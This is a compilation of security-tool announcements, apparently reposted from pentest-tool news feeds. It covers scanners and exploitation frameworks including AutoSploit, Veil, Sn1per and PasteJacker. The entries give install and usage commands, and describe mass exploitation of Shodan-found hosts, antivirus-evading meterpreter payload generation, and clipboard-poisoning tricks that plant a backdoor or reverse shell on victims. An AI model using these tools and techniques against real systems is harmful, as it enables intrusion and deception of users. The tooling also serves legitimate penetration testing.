Kaboom – Automatic Pentest

kaboom is a script that automates a penetration test. It performs several tasks for each phase of the pentest:

Information gathering [nmap-unicornscan]
    TCP scan
    UDP scan

Vulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole]
    It tests several services: smb, ssh, snmp, smtp, ftp, tftp, ms-sql, mysql, rdp, http, https and more...
    It finds the CVEs and then searches for them on exploit-db or in the Metasploit db.

Exploitation [hydra]
    brute force ssh

Usage

kaboom supports two modes:

Interactive mode:
    kaboom [ENTER]
    ...and the script does the rest

NON-interactive mode:
    kaboom <nic> <target_ip> [-s or --shutdown]
    If you use the shutdown option, kaboom will shut down the machine at the end of its tasks.

If you want to see this help:
    kaboom -h (or --help)

Directory Hierarchy

kaboom saves the results of commands in this way:

Download Kaboom

Link: http://www.kitploit.com/2019/02/kaboom-automatic-pentest.html

AutoSploit v3.0 – Automated Mass Exploiter

As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye, but options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started.

Operational Security Consideration

Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the required dependencies available. The new version of AutoSploit has a feature that allows you to set a proxy before you connect, and a custom user-agent.

Installation

Installing AutoSploit is very simple; you can find the latest stable release here. You can also download the master branch as a zip or tarball, or follow one of the methods below.

Cloning

    sudo -s << EOF
    git clone https://github.com/NullArray/AutoSploit.git
    cd AutoSploit
    chmod +x install.sh
    ./install.sh
    python2 autosploit.py
    EOF

Docker

    sudo -s << EOF
    git clone https://github.com/NullArray/AutoSploit.git
    cd AutoSploit
    chmod +x install.sh
    ./install.sh
    cd AutoSploit/Docker
    docker network create -d bridge haknet
    docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
    docker build -t autosploit .
    docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit
    EOF

On any Linux system the following should work:

    git clone https://github.com/NullArray/AutoSploit
    cd AutoSploit
    chmod +x install.sh
    ./install.sh

AutoSploit is compatible with macOS; however, you have to be inside a virtual environment for it to run successfully. In order to accomplish this, perform the operations below via the terminal or in the form of a shell script.

    sudo -s << '_EOF'
    pip2 install virtualenv --user
    git clone https://github.com/NullArray/AutoSploit.git
    virtualenv <PATH-TO-YOUR-ENV>
    source <PATH-TO-YOUR-ENV>/bin/activate
    cd <PATH-TO-AUTOSPLOIT>
    pip2 install -r requirements.txt
    chmod +x install.sh
    ./install.sh
    python autosploit.py
    _EOF

More information on running Docker can be found here.

Usage

Starting the program with python autosploit.py will open an AutoSploit terminal session. The options are as follows.

    1. Usage And Legal
    2. Gather Hosts
    3. Custom Hosts
    4. Add Single Host
    5. View Gathered Hosts
    6. Exploit Gathered Hosts
    99. Quit

Choosing option 2 will prompt you for a platform-specific search query. Enter IIS or Apache, for example, and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.

As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. I've posted the options below as well for reference.

    usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                                [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH
                                [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                                [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

    optional arguments:
      -h, --help            show this help message and exit

    search engines:
      possible search engines to use

      -c, --censys          use censys.io as the search engine to gather hosts
      -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
      -s, --shodan          use shodan.io as the search engine to gather hosts
      -a, --all             search all available search engines to gather hosts

    requests:
      arguments to edit your requests

      --proxy PROTO://IP:PORT
                            run behind a proxy while performing the searches
      --random-agent        use a random HTTP User-Agent header
      -P USER-AGENT, --personal-agent USER-AGENT
                            pass a personal User-Agent to use for HTTP requests
      -q QUERY, --query QUERY
                            pass your search query

    exploits:
      arguments to edit your exploits

      -E PATH, --exploit-file PATH
                            provide a text file to convert into JSON and save for later use
      -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                            set the configuration for MSF (IE -C default 127.0.0.1 8080)
      -e, --exploit         start exploiting the already gathered hosts

    misc arguments:
      arguments that don't fit anywhere else

      --ruby-exec           if you need to run the Ruby executable with MSF use this
      --msf-path MSF-PATH   pass the path to your framework if it is not in your ENV PATH
      --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies

Note: All dependencies should be installed using the above installation method; however, if you find they are not:

AutoSploit depends on the following Python 2.7 modules:
    requests
    psutil

Should you find you do not have these installed, get them with pip like so:

    pip install requests psutil

or

    pip install -r requirements.txt

Since the program invokes functionality from the Metasploit Framework, you need to have this installed also. Get it from Rapid7 by clicking here.

Download AutoSploit

Link: http://www.kitploit.com/2019/01/autosploit-v30-automated-mass-exploiter.html

Commix v2.7 – Automated All-in-One OS Command Injection And Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used by web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Download commix by cloning the Git repository:

    git clone https://github.com/commixproject/commix.git commix

Commix comes packaged in the official repositories of the following Linux distributions, so you can use the package manager to install it!
    ArchStrike
    BlackArch Linux
    BackBox
    Kali Linux
    Parrot Security OS
    Weakerthan Linux

Commix also comes as a plugin on the following penetration testing frameworks:
    TrustedSec's Penetration Testers Framework (PTF)
    OWASP Offensive Web Testing Framework (OWTF)
    CTF-Tools
    PentestBox
    PenBox
    Katoolin
    Aptive's Penetration Testing tools
    Homebrew Tap - Pen Test Tools

Supported Platforms
    Linux
    Mac OS X
    Windows (experimental)

Usage

To get a list of all options and switches use:

    python commix.py -h

Q: Where can I check all the available options and switches?
A: Check the 'usage' wiki page.

Usage Examples
Q: Can I get some basic ideas on how to use commix?
A: Just go and check the 'usage examples' wiki page, where there are several test cases and attack scenarios.

Upload Shells
Q: How easily can I upload web-shells on a target host via commix?
A: Commix enables you to upload web-shells (e.g. metasploit PHP meterpreter) easily on the target host. For more, check the 'upload shells' wiki page.

Modules Development
Q: Do you want to increase the capabilities of the commix tool and/or adapt it to your needs?
A: You can easily develop and import your own modules. For more, check the 'module development' wiki page.

Command Injection Testbeds
Q: How can I test or evaluate the exploitation abilities of commix?
A: Check the 'command injection testbeds' wiki page, which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks.

Exploitation Demos
Q: Is there a place where I can check for demos of commix?
A: If you want to see a collection of demos about the exploitation abilities of commix, take a look at the 'exploitation demos' wiki page.

Bugs and Enhancements
Q: I found a bug / I have to suggest a new feature! What can I do?
A: For bug reports or enhancements, please open an issue here.

Presentations and White Papers
Q: Is there a place where I can find presentations and/or white papers regarding commix?
A: For presentations and/or white papers published in conferences, check the 'presentations' wiki page.

Download Commix

Link: http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html

Metasploit 5.0 – The World’s Most Used Penetration Testing Framework

Knowledge is power, especially when it's shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

Rapid7 announced the release of Metasploit 5.0. The new version includes several important new features and, the company believes, it will be easier to use and more powerful.

Metasploit is the most widely used penetration testing framework and it has more than 1500 modules that deliver functionality covering every phase of a penetration test, making the life of a penetration tester comparatively easier. The most important changes introduced in Metasploit 5.0 include new database and automation APIs, evasion modules and libraries, language support, and improved performance.

Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it's in the process of informing third-party developers that Metasploit 5.0 is stable; Linux distributions such as Kali and ParrotSec ship with Metasploit.

Metasploit 5.0 Release Notes

Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use.

The following is a high-level overview of Metasploit 5.0's features and capabilities.

    Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows multiple Metasploit consoles and external tools to interact with it.
    Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service.
    A JSON-RPC API enables users to integrate Metasploit with additional tools and languages.
    This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here.
    Adds an evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7's first evasion modules are here.
    The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session.
    External modules add Metasploit support for Python and Go in addition to Ruby.
    Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options.
    An updated search mechanism improves Framework start time and removes the database dependency.

Download Metasploit 5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html

Veil – Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. Veil is currently supported by @ChrisTruncer.

Software Requirements:

The following OSs are officially supported:
    Debian 8+
    Kali Linux Rolling 2018.1+

The following OSs are likely able to run Veil:
    Arch Linux
    BlackArch Linux
    Deepin 15+
    Elementary
    Fedora 22+
    Linux Mint
    Parrot Security
    Ubuntu 15.10+

Setup

Kali's Quick Install

    apt -y install veil
    /usr/share/veil/config/setup.sh --force --silent

Git's Quick Install

NOTE:
Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with sudo or change to the root user before beginning.
Your package manager may be different to apt.

    sudo apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil.git
    cd Veil/
    ./config/setup.sh --force --silent

./config/setup.sh // Setup Files

This file is responsible for installing all the dependencies of Veil. This includes the whole WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py for your environment.

It includes two optional flags, --force and --silent:
    --force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.
    --silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.

This can be run either by doing: ./Veil.py --setup OR ./config/setup.sh --force

./config/update-config.py // Regenerating Configuration file

This will generate the output file for /etc/veil/settings.py. Most of the time it will not need to be rebuilt, but in some cases you might be prompted to do so (such as a major Veil update).

It is important that you are in the ./config/ directory before executing update-config.py. If you are not, /etc/veil/settings.py will be incorrect and when you launch Veil you will see the following:

    Main Menu

        0 payloads loaded

Don't panic. Run either: ./Veil.py --config OR cd ./config/; ./update-config.py.

Py2Exe

NOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).

MANUALLY install on a Windows computer (as this isn't done by Veil's setup):
    Python 3.3
    Py2Exe
    PyCrypto
    PyWin32

Example Usage

Veil's Main Menu:

    $ ./Veil.py
    ===============================================================================
                                       Veil | [Version]: 3.1.6
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    Main Menu

        2 tools loaded

    Available Tools:

        1)  Evasion
        2)  Ordnance

    Available Commands:

        exit        Completely exit Veil
        info        Information on a specific tool
        list        List available tools
        options     Show Veil configuration
        update      Update Veil
        use         Use a specific tool

    Veil>:

Help

    $ ./Veil.py --help
    usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
                   [--version] [--ip IP] [--port PORT] [--list-payloads]
                   [-p [PAYLOAD]] [-o OUTPUT-NAME]
                   [-c [OPTION=value [OPTION=value ...]]]
                   [--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
                   [--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
                   [--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]

    Veil is a framework containing multiple tools.

    [*] Veil Options:
      --list-tools          List Veil's tools
      -t TOOL, --tool TOOL  Specify Veil tool to use (Evasion, Ordnance etc.)
      --update              Update the Veil framework
      --setup               Run the Veil framework setup file & regenerate the configuration
      --config              Regenerate the Veil framework configuration file
      --version             Displays version and quits

    [*] Callback Settings:
      --ip IP, --domain IP  IP address to connect back to
      --port PORT           Port number to connect to

    [*] Payload Settings:
      --list-payloads       Lists all available payloads for that tool

    [*] Veil-Evasion Options:
      -p [PAYLOAD]          Payload to generate
      -o OUTPUT-NAME        Output file base name for source and compiled binaries
      -c [OPTION=value [OPTION=value ...]]
                            Custom payload module options
      --msfoptions [OPTION=value [OPTION=value ...]]
                            Options for the specified metasploit payload
      --msfvenom []         Metasploit shellcode to generate (e.g. windows/meterpreter/reverse_tcp etc.)
      --compiler pyinstaller
                            Compiler option for payload (currently only needed for Python)
      --clean               Clean out payload folders

    [*] Veil-Ordnance Shellcode Options:
      --ordnance-payload PAYLOAD
                            Payload type (bind_tcp, rev_tcp, etc.)

    [*] Veil-Ordnance Encoder Options:
      --list-encoders       Lists all available encoders
      -e ENCODER, --encoder ENCODER
                            Name of shellcode encoder to use
      -b \x00\x0a.., --bad-chars \x00\x0a..
                            Bad characters to avoid
      --print-stats         Print information about the encoded shellcode
    $

Veil Evasion CLI

    $ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

    runtime/internal/sys
    runtime/internal/atomic
    runtime
    errors
    internal/race
    sync/atomic
    math
    sync
    io
    unicode/utf8
    internal/syscall/windows/sysdll
    unicode/utf16
    syscall
    strconv
    reflect
    encoding/binary
    command-line-arguments
    ===============================================================================
                                       Veil-Evasion
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

     [*] Language: go
     [*] Payload Module: go/meterpreter/rev_tcp
     [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
     [*] Source code written to: /var/lib/veil/output/source/payload.go
     [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
    $
    $ file /var/lib/veil/output/compiled/payload.exe
    /var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
    $

Veil Ordnance CLI

    $ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
    ===============================================================================
                                       Veil-Ordnance
    ===============================================================================
          [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================

     [*] Payload Name: Reverse TCP Stager (Stage 1)
     [*] IP Address: 127.0.0.1
     [*] Port: 4444
     [*] Shellcode Size: 287
    $

Download Veil

Link: http://www.kitploit.com/2018/12/veil-tool-to-generate-metasploit.html

Sn1per v6.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:
    Professional reporting interface
    Slideshow for all gathered screenshots
    Searchable and sortable DNS, IP and open port database
    Categorized host reports
    Quick links to online recon tools and Google hacking queries
    Personalized notes field for each host

SN1PER COMMUNITY FEATURES:
    Automatically collects basic recon (ie. whois, ping, DNS, etc.)
    Automatically launches Google hacking queries against a target domain
    Automatically enumerates open ports via NMap port scanning
    Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
    Automatically checks for sub-domain hijacking
    Automatically runs targeted NMap scripts against open ports
    Automatically runs targeted Metasploit scan and exploit modules
    Automatically scans all web applications for common vulnerabilities
    Automatically brute forces ALL open services
    Automatically tests for anonymous FTP access
    Automatically runs WPScan, Arachni and Nikto for all web services
    Automatically enumerates NFS shares
    Automatically tests for anonymous LDAP access
    Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
    Automatically enumerates SNMP community strings, services and users
    Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
    Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
    Automatically tests for open X11 servers
    Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
    Performs high level enumeration of multiple hosts and subnets
    Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
    Automatically gathers screenshots of all web sites
    Create individual workspaces to store all scan output

AUTO-PWN:
    Drupal Drupalgedon2 RCE CVE-2018-7600
    GPON Router RCE CVE-2018-10561
    Apache Struts 2 RCE CVE-2017-5638
    Apache Struts 2 RCE CVE-2017-9805
    Apache Jakarta RCE CVE-2017-5638
    Shellshock GNU Bash RCE CVE-2014-6271
    HeartBleed OpenSSL Detection CVE-2014-0160
    Default Apache Tomcat Creds CVE-2009-3843
    MS Windows SMB RCE MS08-067
    Webmin File Disclosure CVE-2006-3392
    Anonymous FTP Access
    PHPMyAdmin Backdoor RCE
    PHPMyAdmin Auth Bypass
    JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:

    ./install.sh

DOCKER INSTALL:

Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Example usage:

    $ docker pull menzo/sn1per-docker
    $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:

[*] NORMAL MODE
    sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
    sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
    sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
    sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
    sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
    sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
    sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
    sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
    sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
    sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
    sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
    sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
    sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
    sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
    sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
    sniper -u|--update

MODES:

NORMAL: Performs a basic scan of targets and open ports using both active and passive checks for optimal performance.
STEALTH: Quickly enumerates single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts/IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
NUKE: Launches a full audit of multiple hosts specified in a text file of your choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
UPDATE: Checks for updates and upgrades all components used by sniper.
REIMPORT: Reimports all workspace files into Metasploit and reproduces all reports.
RELOAD: Reloads the master workspace report.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc

Download Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/RLWB_3_Wk9M/sn1per-v60-automated-pentest-framework.html

BlobRunner – Quickly Debug Shellcode Extracted During Malware Analysis

BlobRunner is a simple tool to quickly debug shellcode extracted during malware analysis.

BlobRunner allocates memory for the target file and jumps to the base (or offset) of the allocated memory. This allows an analyst to quickly debug into extracted artifacts with minimal overhead and effort.

To use BlobRunner, you can download the compiled executable from the releases page or build your own using the steps below.

Building

Building the executable is straightforward and relatively painless.

Requirements
    Download and install Microsoft Visual C++ Build Tools or Visual Studio

Build Steps
    Open Visual Studio Command Prompt
    Navigate to the directory where BlobRunner is checked out
    Build the executable by running:
        cl blobrunner.c

Building BlobRunner x64

Building the x64 version is virtually the same as above, but simply uses the x64 tooling.
    Open x64 Visual Studio Command Prompt
    Navigate to the directory where BlobRunner is checked out
    Build the executable by running:
        cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.c

Usage

To debug:
    Open BlobRunner in your favorite debugger.
    Pass the shellcode file as the first parameter.
    Add a breakpoint before the jump into the shellcode.
    Step into the shellcode.

    BlobRunner.exe shellcode.bin

Debug into the file at a specific offset.

    BlobRunner.exe shellcode.bin --offset 0x0100

Debug into the file and don't pause before the jump. Warning: Ensure you have a breakpoint set before the jump.

    BlobRunner.exe shellcode.bin --nopause

Debugging x64 Shellcode

Inline assembly isn't supported by the x64 compiler, so to support debugging into x64 shellcode the loader creates a suspended thread, which allows you to place a breakpoint at the thread entry before the thread is resumed.

Remote Debugging Shell Blobs (IDAPro)

The process is virtually identical to debugging shellcode locally, with the exception that you need to copy the shellcode file to the remote system. If the file is copied to the same path you are running win32_remote.exe from, you just need to use the file name for the parameter. Otherwise, you will need to specify the path to the shellcode file on the remote system.

Shellcode Samples

You can quickly generate shellcode samples using the Metasploit tool msfvenom.

Generating a simple Windows exec payload:

    msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -o test2.bin

Feedback / Help

Any questions, comments or requests: you can find us on twitter, @seanmw or @herrcore.
Pull requests welcome!

Download BlobRunner

Link: http://feedproxy.google.com/~r/PentestTools/~3/0kcKLQrdZYA/blobrunner-quickly-debug-shellcode.html

DarkSpiritz v2.0 – A Penetration Testing Framework For Linux, MacOS, And Windows Systems

A penetration testing framework for Linux and Windows systems.

What is DarkSpiritz?

Created by the SynTel Team, it was a project of one of the owners to update and clean up an older pentesting framework he had created into something updated and modern. DarkSpiritz is a revamp of the very popular framework known as "Roxysploit". You may be familiar with this framework, and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use Metasploit, setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins, or you can head to our wiki here. If you need any help feel free to contact us at syndicatedintel@protonmail.com.

Syntel Team:
    M4cs | @maxbridgland
    Ryan | @ryan0x1

Version 2.0 UPDATE (READ IMPORTANT)

This version should run a lot smoother and have a cleaner UI. Check the reddit post here to see all changes: https://www.reddit.com/r/netsec/comments/9skdju/huge_update_to_darkspiritz_pentesting_framework/

Getting Started

Clone the repository with git:

    git clone https://github.com/DarkSpiritz/DarkSpiritz.git

DarkSpiritz wiki available here.

To install DarkSpiritz, clone the github repo and run:

    pip install -r requirements.txt

This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:

    python start.py

or

    ./start.py

(if ./start.py doesn't work, run chmod +x start.py from within the same directory as DarkSpiritz.)

You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

Features:

These are features that the DarkSpiritz Team prides itself on:
    Real Time Updating of Configuration: never a need to restart the program, even when adding plugins or editing them.
    Easy to use UX
    Multi-functionality

Download DarkSpiritz

Link: http://feedproxy.google.com/~r/PentestTools/~3/_qFlgmuW1Is/darkspiritz-v20-penetration-testing.html

PasteJacker – Add PasteJacking To Web-Delivery Attacks

The main purpose of the tool is automating the (PasteJacking/Clipboard poisoning/whatever you name it) attack by collecting all the known tricks used in this attack in one place and one automated job, as after searching I found there's no tool doing this job the right way.

Now, while this attack depends on what the user will paste, imagine adding this attack to the Metasploit web delivery module.

See this simple scenario to make things clear:
    The target opens an HTML page served by the tool, and this page has anything that makes the target want to copy from it to the terminal, like some installation instructions.
    The target copies a thing from the page; then it is quickly replaced with our line.
    The user pastes it in the terminal and, before he notices that the line changed, the line gets executed by itself in the background and the terminal gets cleared.
    All of that happened in a second and the user sees the terminal is usable again, and maybe thinks this is a bad program and he won't install it, but you already got your meterpreter shell.

This tool uses 3 methods to trick the user into copying our payload instead of the command he copies:

Using javascript to hook the copy event and replace the copied data.
    Advantages:
        Anything the user copies in the page will be replaced with our line.
        The command is executed by itself once the target pastes it, without pressing enter.
    Disadvantages:
        Requires Javascript to be enabled on the target browser.

Using the span style attribute to hide our lines by overwriting.
    Advantages:
        Doesn't require javascript to be enabled.
        Works on all browsers.
    Disadvantages:
        The target must select all the text in the page, or the first two words, to ensure that he copies our hidden malicious lines.

Using span style again, but this time to make our text transparent and non-markable.
    Advantages:
        Doesn't require javascript to be enabled.
    Disadvantages:
        The target must select all the text in the page to ensure that he copies our hidden malicious lines.
        Not working on opera and chrome.

What's the payload the user copies?

PasteJacker gives you the option to do one of these things:
    Generate a msfvenom backdoor on our machine; the one-liner the target is going to copy will download the backdoor onto its machine, through wget or certutil depending on the OS, then execute it in the background without printing anything to the terminal.
    Serve a one-liner that gets you a reverse netcat connection on the target machine, running in the background of course.
    Serve your custom one-liner, like the Metasploit web-delivery payload, with some touches added to hide any possible output.

Installing and requirements
    Python 3 and the setuptools module.
    Linux or Unix-based system (currently tested only on Kali Linux rolling and Ubuntu 16.04).
    Third-party requirements like msfvenom, but only if you are going to use the msfvenom option, of course.
    Third-party library ncurses-dev for Ubuntu (thanks to @mhaskar).
    Root access.

Installing

For Linux:

    git clone https://github.com/D4Vinci/PasteJacker.git
    sudo python3 -m pip install ./PasteJacker
    sudo pastejacker

Updating the framework or the database

On Linux, while outside the directory:

    cd PasteJacker && git pull && cd ..
    sudo python3 -m pip install ./PasteJacker --upgrade

References
    PasteJacking GitHub repo
    Clipboard poisoning attacks on the Mac - Malwarebytes
    Metasploit web delivery module

Contact
    Twitter

Disclaimer

PasteJacker is created to help in penetration testing and it's not responsible for any misuse or illegal purposes.
Copying code from this tool or using it in another tool is accepted as long as you mention where you got it from.
Pull requests are always welcomed :D

Download PasteJacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/oO5iiRHaY_4/pastejacker-add-pastejacking-to-web.html

UPDATED VERSION: RouterSploit 3.4.0

PenTestIT RSS Feed
RouterSploit 3.4.0, the long awaited router exploitation framework update, is out guys! This release includes some really cool features and updates, such as using pycryptodome (in place of pycrypto) and newer exploitation modules! Read on for the improvements.

What is RouterSploit?

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. It consists of the following
Read more about UPDATED VERSION: RouterSploit 3.4.0
The post UPDATED VERSION: RouterSploit 3.4.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-4-0/